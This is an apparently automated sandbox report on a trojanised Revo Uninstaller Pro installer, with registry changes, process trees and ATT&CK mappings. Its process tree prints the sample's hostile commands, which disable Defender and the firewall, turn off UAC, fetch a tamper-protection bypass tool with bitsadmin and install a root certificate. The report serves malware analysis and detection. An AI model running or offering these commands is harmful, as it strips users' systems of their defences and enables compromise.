Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0"	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\DefaultIcon	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1"	ruplp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel	Revo Uninstaller Pro 4.2.3.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\"	ruplp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe"	Revo Uninstaller Pro 4.2.3.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}"	regsvr32.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	111.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	111.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
1520	powershell.exe
2956	powershell.exe
1272	powershell.exe
1456	powershell.exe
2668	powershell.exe
2112	powershell.exe
1000	powershell.exe
1384	powershell.exe
2484	powershell.exe
908	powershell.exe
2512	powershell.exe
2236	powershell.exe
2188	powershell.exe
584	powershell.exe
2548	powershell.exe
2816	powershell.exe
3060	powershell.exe
2336	Revo Uninstaller Pro 4.2.3.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2228	111.exe
2228	111.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2956	powershell.exe
Token: SeDebugPrivilege	1272	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	1000	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1356	rundll32.exe
Token: SeRestorePrivilege	1564	7z.exe
Token: 35	1564	7z.exe
Token: SeSecurityPrivilege	1564	7z.exe
Token: SeSecurityPrivilege	1564	7z.exe
Token: SeRestorePrivilege	1136	7z.exe
Token: 35	1136	7z.exe
Token: SeSecurityPrivilege	1136	7z.exe
Token: SeSecurityPrivilege	1136	7z.exe
Token: SeRestorePrivilege	2548	7z.exe
Token: 35	2548	7z.exe
Token: SeSecurityPrivilege	2548	7z.exe
Token: SeSecurityPrivilege	2548	7z.exe
Token: SeDebugPrivilege	2228	111.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
2336	Revo Uninstaller Pro 4.2.3.tmp
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe

Suspicious use of SendNotifyMessage 19 IoCs

pid	Process
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3044	RevoUninPro.exe
3044	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe
2844	RevoUninPro.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 1924 wrote to memory of 2712	1924	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe	30
PID 2712 wrote to memory of 336	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	31
PID 2712 wrote to memory of 336	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	31
PID 2712 wrote to memory of 336	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	31
PID 2712 wrote to memory of 336	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	31
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 2712 wrote to memory of 2840	2712	0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp	32
PID 336 wrote to memory of 2864	336	WScript.exe	33
PID 336 wrote to memory of 2864	336	WScript.exe	33
PID 336 wrote to memory of 2864	336	WScript.exe	33
PID 336 wrote to memory of 2864	336	WScript.exe	33
PID 2864 wrote to memory of 3056	2864	cmd.exe	35
PID 2864 wrote to memory of 3056	2864	cmd.exe	35
PID 2864 wrote to memory of 3056	2864	cmd.exe	35
PID 2864 wrote to memory of 3056	2864	cmd.exe	35
PID 2864 wrote to memory of 2884	2864	cmd.exe	37
PID 2864 wrote to memory of 2884	2864	cmd.exe	37
PID 2864 wrote to memory of 2884	2864	cmd.exe	37
PID 2864 wrote to memory of 2884	2864	cmd.exe	37
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2840 wrote to memory of 2336	2840	Revo Uninstaller Pro 4.2.3.exe	36
PID 2864 wrote to memory of 1520	2864	cmd.exe	39
PID 2864 wrote to memory of 1520	2864	cmd.exe	39
PID 2864 wrote to memory of 1520	2864	cmd.exe	39
PID 2864 wrote to memory of 1520	2864	cmd.exe	39
PID 2864 wrote to memory of 2956	2864	cmd.exe	40
PID 2864 wrote to memory of 2956	2864	cmd.exe	40
PID 2864 wrote to memory of 2956	2864	cmd.exe	40
PID 2864 wrote to memory of 2956	2864	cmd.exe	40
PID 2864 wrote to memory of 1272	2864	cmd.exe	41
PID 2864 wrote to memory of 1272	2864	cmd.exe	41
PID 2864 wrote to memory of 1272	2864	cmd.exe	41
PID 2864 wrote to memory of 1272	2864	cmd.exe	41
PID 2864 wrote to memory of 1456	2864	cmd.exe	42
PID 2864 wrote to memory of 1456	2864	cmd.exe	42
PID 2864 wrote to memory of 1456	2864	cmd.exe	42
PID 2864 wrote to memory of 1456	2864	cmd.exe	42
PID 2864 wrote to memory of 2668	2864	cmd.exe	43
PID 2864 wrote to memory of 2668	2864	cmd.exe	43
PID 2864 wrote to memory of 2668	2864	cmd.exe	43
PID 2864 wrote to memory of 2668	2864	cmd.exe	43
PID 2864 wrote to memory of 2112	2864	cmd.exe	44
PID 2864 wrote to memory of 2112	2864	cmd.exe	44
PID 2864 wrote to memory of 2112	2864	cmd.exe	44
PID 2864 wrote to memory of 2112	2864	cmd.exe	44
PID 2864 wrote to memory of 1000	2864	cmd.exe	45
PID 2864 wrote to memory of 1000	2864	cmd.exe	45
PID 2864 wrote to memory of 1000	2864	cmd.exe	45

C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$50150,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:336
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2864
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3056
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
        5⤵
        Download via BitsAdmin
        System Location Discovery: System Language Discovery
        
        PID:2884
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2956
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1272
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1456
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2668
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -PUAProtection disable"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1000
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -command "netsh advfirewall set allprofiles state off"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
      - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2652
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3052
    - - C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2544
    - - C:\ProgramData\uzlyLtM20yixSdV\7z.exe
        
        7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
    - - C:\ProgramData\uzlyLtM20yixSdV\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1136
    - - C:\ProgramData\uzlyLtM20yixSdV\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2548
    - - C:\ProgramData\uzlyLtM20yixSdV\111.exe
        
        "111.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
      - C:\ProgramData\uzlyLtM20yixSdV\111.exe
        
        "C:\ProgramData\uzlyLtM20yixSdV\111.exe"
        6⤵
        Executes dropped EXE
        
        PID:2532
      - C:\ProgramData\uzlyLtM20yixSdV\111.exe
        
        "C:\ProgramData\uzlyLtM20yixSdV\111.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:2988
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:896
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 180 /NOBREAK
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1584
- - C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
    "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$30186,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2336
    - - C:\Windows\system32\rundll32.exe
        
        "rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        5⤵
        Drops file in Drivers directory
        Adds Run key to start application
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
      - C:\Windows\system32\runonce.exe
        
        "C:\Windows\system32\runonce.exe" -r
        6⤵
        Checks processor information in registry
        
        PID:1868
        
        C:\Windows\System32\grpconv.exe
        
        "C:\Windows\System32\grpconv.exe" -o
        7⤵
        
        PID:1780
    - - C:\Windows\system32\regsvr32.exe
        
        "regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
        5⤵
        Loads dropped DLL
        Modifies system executable filetype association
        Modifies registry class
        
        PID:776
    - - C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
        
        "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1876
    - - C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        
        "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:3044
    - - C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        
        "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2844

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

